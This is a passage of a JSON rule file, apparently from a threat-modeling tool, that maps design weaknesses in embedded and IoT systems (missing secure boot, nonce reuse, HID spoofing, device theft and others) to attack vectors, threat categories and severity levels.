expiration","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"bf289171-82c3-431a-b3f1-28d17e5a6546","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"51473250-3891-4342-a8b8-687db16ffef3","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"dde91006-ebc4-4e9c-906b-8c3591266097","Name":"Session timeout","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"bf289171-82c3-431a-b3f1-28d17e5a6546","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a21a6894-256f-4bfd-bd49-09352d054399","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a100a6c5-5f38-4224-a74a-825fa89579c2","Name":"Password recovery","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"2f483201-0209-4320-ba2e-2d692274aab5","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a9b6390d-0145-4e0f-8420-8a9b8f728c3d","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"96876c2e-a3e9-4e0f-afd0-fe721dd0f295","Name":"Client-side hashing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"4ee3fc8a-87a5-4fdf-868f-fb35cd12dc91","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ba8dc5f0-e1a9-4263-8179-747791b873ee","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"2b389d13-5f71-4bb4-b111-a7fee2b6a486","Name":"Restriction to hardware features","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"9e85cf25-febb-46ca-a5f5-c6283412a87b","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"6c83ccbc-ffbd-4bd6-b207-07386e3393c5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4d88ce07-2a06-4ae3-942a-46eb25ccdd9b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"11975f59-55e0-420f-9366-513175e9236e","Name":"Missing secure boot","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4f0c5fb9-e24f-487a-b192-66d10c2b97a5","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"1487298b-ff88-4e01-9a60-09b1eaf8a41f","Name":"Missing immutable Root of Trust","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"f170308a-c188-4ae0-bcef-d04af1e429b3","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"17b59f51-59d3-4a8f-9960-a04ce7e96be6","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"c54de80f-b548-4432-9ec0-fa3a579be7e6","Name":"Updatable","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"99864969-3b71-45ad-bae5-09bc4ecc5cc1","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"367b80cd-1b41-483b-a157-b143714b8af7","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"c6535534-7656-4819-93fe-19d9a78a9390","Name":"Roll-back","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"c23a62c8-901a-412b-80b8-d2574103b733","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d951b792-f84b-4ab3-82d1-21867e202755","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"85b3711a-33d2-4cd2-9c84-471e76cc761c","Name":"Improper debug access control","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8a6476b9-7a5c-4306-bd43-db6fe32bbf66","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f40ce61a-c823-4ca7-ab51-a70dbd9718a6","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"12c8413b-e1cc-40d6-ae07-6321c5fbf4a0","Name":"Internal assets exposed","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1a99fb9b-d1f0-4215-93a6-5cd9fd272026","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"517b62dd-eea7-426e-82c6-2c458eed0aaf","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"5aac31c8-fcb7-4d27-8937-e2c9747b83d4","Name":"Address Region Overlap","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"24645edb-85ac-438b-9033-ba2721c3e2c7","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ca6a9224-153b-4c06-8c1b-4ea3333c8e92","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"6630ce3a-e21d-467a-b669-99418e95cd8a","Name":"State Transition","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5656f112-8443-4245-aa38-38cd9d9375e0","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"16ab50f4-dd94-43dd-8480-37cae5c61043","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"6aec11cc-995c-4ee9-a1ce-506b071f3da3","Name":"Risky cryptographic algorithm ","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"31f89637-4b8a-41e9-acac-9d012767a424","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"783c742d-ebbf-4a58-b8c9-bdc0faeff57d","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"2ee8ccf6-2886-4ebe-81d9-46a408b553a3","Name":"Less-secure downgrade","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97b5a1d4-be82-4485-82f6-e4532795a20b","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"56a10ad5-a9bf-426f-8e83-ba07561ca78b","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"f46ae96c-b62c-4fda-955d-6ed55c157c7f","Name":"Weak block cipher mode","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a20d6e53-4426-4700-a04f-a4018bc7bfce","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"518bbb50-aeee-4c87-95d1-8724a4dac569","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"dfac545d-b449-45d0-95bd-a7814b1a97ce","Name":"Appropriate parameters","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"08377961-8f56-4b56-b684-331f77810f1d","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"4e5318de-8259-41cd-8704-8842a959b9c6","Name":"Insufficient entropy","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"0ffd675d-d83c-4f74-8835-398e7f3930cb","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"420f03a2-1ab7-4bc2-910d-4ea025518da2","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a904d935-a9d7-45d9-83c8-c403a57e0b80","Name":"Nonce reuse","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"680ceebd-357c-49d6-8bfd-390dc6c51dde","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f35ccff8-6497-4b28-8627-7f255bce0e02","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"12caa9f9-0b1c-4ce0-ac2b-ebee69001b1e","Name":"HID spoofing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"195d942e-02f8-49ad-873f-299f4b4ad4ec","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"111a5819-f53f-4a8d-81df-6b756a20efe7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"23564ce2-4786-4144-85b6-d03de2771d6b","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"38d27f20-a7ee-40dc-aa6f-b10c98d72409","Name":"Malicious file","Description":"Social engineering: An USB flash drive contains interesting but malicious files","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"cf948333-b659-40ff-b93f-d4bdc8c980d1","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"111a5819-f53f-4a8d-81df-6b756a20efe7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e884ecfe-bda1-4f0b-86f7-3ce0d735aeeb","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"8597431f-52e2-4d89-bb21-7d34185dbfe6","Name":"USB killer","Description":"Note: this type of attack is also possible at other interfaces such as HDMI, Thunderbolt, etc.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"915f674e-926b-4bd9-94cb-ee8b4637bc80","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","88d19822-b1b0-469f-ae00-1bc600ccaa1d","644f8521-6b49-41bc-86df-4064b89fb881","96bdc11d-dbb0-4785-8a5c-373e2c492eb0"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"111a5819-f53f-4a8d-81df-6b756a20efe7","DetailRestrictions":[]},"Severity":3},{"ID":"b8438e31-cc77-4400-86c0-14aa01d411ae","Name":"Ethernet port scan","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"f5949698-47d4-48ee-a116-2d212695c41f","ThreatCategoryIDs":[]},"overridenRuleIDs":["fa055483-b3a2-461f-b09c-46e99de0455e"],"RuleType":1,"StencilRestriction":{"stencilTypeID":"58e0c62c-e5b7-4e9f-9f8a-f8150cf18930","DetailRestrictions":[]},"Severity":1},{"ID":"fa055483-b3a2-461f-b09c-46e99de0455e","Name":"WiFi port scan","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"f5949698-47d4-48ee-a116-2d212695c41f","ThreatCategoryIDs":[]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","DetailRestrictions":[]},"Severity":1},{"ID":"9ec88af2-3da9-41df-93bf-8cbcb74a7bb6","Name":"Protocol design issues","Description":"Custom protocols may be not sufficiently tested and therefore more likely include vulnerabilities","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b8835cb9-3c77-496e-ac2d-2ed6fa7f2d78","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":4,"StencilRestriction":{"stencilTypeID":"c4ce892e-975c-48f5-a0f8-e6eb7591111d","DetailRestrictions":[]},"ProtocolRestriction":{"protocolID":"c4ce892e-975c-48f5-a0f8-e6eb7591111d","DetailRestrictions":[]},"Severity":2},{"ID":"21c438f5-30d1-4cfc-9deb-78827b036a22","Name":"Actuator command injection","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"573881b4-ceb6-4d6a-a5c3-9c0e6c5a3b3c","ThreatCategoryIDs":["88d19822-b1b0-469f-ae00-1bc600ccaa1d","f2ba26f4-b2da-49a8-aba2-14e42a746d6a","b7935cfe-6a41-45e4-8778-f0fbb1e4018b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"NewProperty3","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"8aa3a3b1-0aff-4e15-ad59-cc40b75dbdbd","Name":"Sensor data manipulation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a76b8768-9d68-4074-b5e1-0f9abc61bcda","ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f2ba26f4-b2da-49a8-aba2-14e42a746d6a","b7935cfe-6a41-45e4-8778-f0fbb1e4018b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":0,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"NewProperty1","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"b41b621c-4b91-43f9-90ab-b7e955269620","Name":"Device theft","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"30cf5142-2339-4130-8a6e-2b05869e6df2","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","6b8c08cb-3f02-413a-96b4-179bb1f67997"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b8b580e-f99a-4e0c-850d-241fccfd0079","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e9148055-f813-45da-85a8-bfcf4d71ff40","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"08043f24-cc72-435b-ace1-bd593442215d","Name":"Unauthorized unplugging","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","7cf3480c-f4db-47cb-be36-b27deb746c64"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"e75f9804-6ae3-4eb6-9011-4b87a0d4823b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cef5bbac-5833-49bb-9021-9f5200c29c83","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"e8848ea8-e120-4722-bc10-90daf7b4a075","Name":"Compliance loss duty cycle limit","Description":"For example Europe defines a maximum duty cycle","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["1180824d-9f8a-4a4a-8398-3775c541a360"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4edf4a31-e828-4933-9a87-779083e7167e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"229d9064-0034-4e55-998e-a50d8e0f9dd4","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"0e783801-b482-4721-af49-1be96b16fc59","Name":"Communication outage","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4edf4a31-e828-4933-9a87-779083e7167e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"229d9064-0034-4e55-998e-a50d8e0f9dd4","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"512c6921-1b40-4e26-86b5-f66609e57d96","Name":"Data store theft","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"30cf5142-2339-4130-8a6e-2b05869e6df2","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","6b8c08cb-3f02-413a-96b4-179bb1f67997"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsRemovable","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"8c29ed3b-b151-41de-81ae-627227aaa104","Name":"Selective forwarding","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"c7787e71-5c70-462c-9558-ce20e7cfdfe8","ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":2,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[]},"Severity":2},{"ID":"6a9008d4-fa27-46b1-8a11-6dbcecb8b211","Name":"Human identification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["bcd08af5-29bf-4ed8-ab6c-e311e88f4c84"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c2d71a11-6228-4e05-bc93-0ddd45328fde","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"38883a00-d18f-4d1f-8a4c-18741a480557","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"e5f4b790-5898-495d-9b51-5a16d452edff","Name":"Privacy-violating interaction","Description":"Gestures in public environments result in privacy-violating interaction","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["af3ee78e-9e83-4bd1-b9b5-13ec28765518"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c2d71a11-6228-4e05-bc93-0ddd45328fde","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d9919a71-0642-46a5-8056-348e06f8b86e","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"8340469b-525d-4563-a75d-6ca1d60c7409","Name":"Hidden interfaces","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"184cd5e5-2517-4d7f-a81a-c411942d3601","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"311904f3-7898-4bab-ba74-e6024c704cd3","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"d714118d-123d-41b4-8997-63b13a5c09d4","Name":"Integrity validation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8f47a4ac-0934-4a65-a6f3-07503c92f658","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"90c71cb6-ec32-4eb6-95ca-20a5d7381fc6","Name":"Authenticity validation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"00f961fc-97ce-4003-8f2e-79a4748ec0b2","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"cb711ade-c26b-4500-8337-4eba00d26975","Name":"TOCTOU attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"cf63f187-4353-4bf8-bc37-a7392c6d91bf","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"000441ff-d15f-46c3-bb9c-0c949063271d","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"1729c2ac-4dd2-449a-bd8a-ee7c11ff1461","Name":"Unknown state","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"3df6a845-52a2-40a9-8978-0277efd7cfcb","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b9caf305-7c53-48c9-beef-2fb2a96cc5b0","Name":"Regulation compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["1180824d-9f8a-4a4a-8398-3775c541a360"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4006de15-8767-4a09-8678-84b8d6b50ae0","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"778eb19f-8f36-4ce5-aa48-70429386b113","Name":"Improper log access 